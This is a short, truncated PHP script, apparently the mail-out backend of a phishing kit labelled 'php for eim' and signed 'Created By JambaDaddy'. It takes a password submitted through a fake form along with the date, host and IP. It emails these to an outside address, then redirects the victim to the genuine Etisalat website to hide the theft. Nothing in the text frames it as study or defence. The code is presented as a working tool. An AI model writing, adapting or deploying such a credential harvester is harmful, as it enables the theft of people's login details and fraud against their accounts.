php for eim
php for eim
"\n";
$message .= "Password : ".$_POST['password']."\n";
$message .= "Date: ".$adddate."\n";
$message .= "Host: ".$host."\n";
$message .= "------------- Created By JambaDaddy ---------------\n";
$recipient = "[email protected]";
$subject = "Email Eim $ip";
$from = "[email protected]";
$headers .= $_POST['$host']."\n";
$headers .= "MIME-Version: 1.0\n";
$headers = "From: $from\r\n";
if (mail($recipient,$subject,$message,$headers))
{
header("Location: https://www.etisalat.ae/en/index.html");
}
else
{
echo "ERROR! Please go back and try again.";
}
?><?